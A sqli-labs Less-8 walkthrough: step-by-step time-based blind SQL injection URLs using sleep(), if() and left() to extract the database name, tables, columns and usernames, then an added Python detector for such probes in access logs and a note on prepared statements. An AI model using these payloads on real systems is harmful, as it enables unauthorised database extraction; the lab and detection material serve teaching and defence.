http://192.168.31.164:9002/Less-8/?id=1'
Append a single quote: '
The page no longer shows "You are in..."
http://192.168.31.164:9002/Less-8/?id=1'--+
Append '--+ (close the string literal and comment out the rest of the query)
The page displays normally again
http://192.168.31.164:9002/Less-8/?id=1' and sleep(5)--+
Appending and sleep(5) produces a 5-second delay, which confirms that the SQL injection vulnerability exists
http://192.168.31.164:9002/Less-8/?id=1' and if(length(database())=8,sleep(3),1)--+
Use the if function, if(1,2,3) (condition, value if true, value if false), to test the length of the database name: if the condition is correct the response is delayed by 3s, otherwise it returns 1
http://192.168.31.164:9002/Less-8/?id=1' and if((left(database(),1)='s'),sleep(3),1)--+
Use the delay to determine the first letter of the database name, then the second letter, and so on
Determine the table name: http://192.168.31.164:9002/Less-8/?id=1' and if((left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='b'),sleep(3),1)--+
Determine the column name: http://192.168.31.164:9002/Less-8/?id=1' and if((left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)>'d'),sleep(3),1)--+
Determine the column name: http://192.168.31.164:9002/Less-8/?id=1' and if((left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'),sleep(3),1)--+
Determine the table contents: http://192.168.31.164:9002/Less-8/?id=1' and if((left((select username from security.users limit 0,1),1)='d'),sleep(3),1)--+
The main work is changing the limit and left parameters to guess the contents one character at a time
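The probing sequence above has a recognisable footprint on the server side: a quote plus comment sequence in a query parameter, a sleep()/if() call, and a response time that jumps from milliseconds to whole seconds. The following is an added detection example, not part of the original notes or of sqli-labs; it parses constructed Apache-style access-log lines (with a constructed response-time field in milliseconds appended) and flags the requests that match that footprint, grouping hits per client address. The log format, field layout and threshold are assumptions.

```python
"""Flag time-based blind SQL injection probes in web access logs.

Added example (not from the original walkthrough). Input lines are
constructed here to look like the Less-8 requests above, in an
Apache combined-style format with a trailing response time in ms
(an assumption about how the server logs latency).
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Constructed sample log: ip ident user [ts] "request" status bytes ms
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-8/?id=1 HTTP/1.1" 200 512 120
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-8/?id=1%27--+ HTTP/1.1" 200 512 118
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-8/?id=1%27%20and%20sleep(5)--+ HTTP/1.1" 200 512 5130
10.0.0.5 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-8/?id=1%27%20and%20if(length(database())=8,sleep(3),1)--+ HTTP/1.1" 200 512 3102
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-8/?id=2 HTTP/1.1" 200 498 131
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# Delay primitives: the only reason to put these in a query parameter
# is to measure how long the database takes to answer.
TIME_FUNC_RE = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)
# The conditional wrapper that turns a true/false guess into a delay.
CONDITIONAL_RE = re.compile(r"\bif\s*\(", re.I)
# A quote followed by a comment marker: closes the literal, drops the tail.
TRUNCATION_RE = re.compile(r"'.*(--|#|/\*)", re.S)


def inspect_request(target: str, ms: int, slow_ms: int = 2000) -> Optional[dict]:
    """Return a finding for the first suspicious query parameter, or None."""
    parsed = urlparse(target)
    # parse_qs percent-decodes and turns '+' into a space, so '--+' becomes '-- '
    params = parse_qs(parsed.query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            reasons = []
            if TIME_FUNC_RE.search(value):
                reasons.append("time_function")
            if CONDITIONAL_RE.search(value):
                reasons.append("conditional")
            if TRUNCATION_RE.search(value):
                reasons.append("quote_and_comment")
            if ms >= slow_ms:
                reasons.append(f"slow_response:{ms}ms")
            # High: an explicit delay call, or a truncated query that was also slow.
            # Low: quote-and-comment alone (the initial syntax probe).
            if "time_function" in reasons or (
                "quote_and_comment" in reasons and ms >= slow_ms
            ):
                severity = "high"
            elif "quote_and_comment" in reasons:
                severity = "low"
            else:
                continue
            return {
                "path": parsed.path,
                "param": name,
                "value": value,
                "reasons": reasons,
                "severity": severity,
            }
    return None


def analyze_log(text: str, slow_ms: int = 2000) -> list:
    """Parse every log line and collect findings, tagged with client ip and time."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        hit = inspect_request(m["target"], int(m["ms"]), slow_ms)
        if hit:
            hit["ip"] = m["ip"]
            hit["ts"] = m["ts"]
            findings.append(hit)
    return findings


def per_client_summary(findings: list) -> dict:
    """Count findings per source address; a blind-injection run is many requests from one client."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["severity"], h["param"], h["reasons"])
    print(per_client_summary(hits))
```

The per-client count matters more than any single hit: character-by-character guessing, as in the notes above, means one address sending hundreds of near-identical requests whose only difference is the limit and left arguments, so a rate of flagged requests per source is a stronger signal than one regex match. On the application side the whole class disappears when the id parameter is bound with a prepared statement instead of being concatenated into the query string.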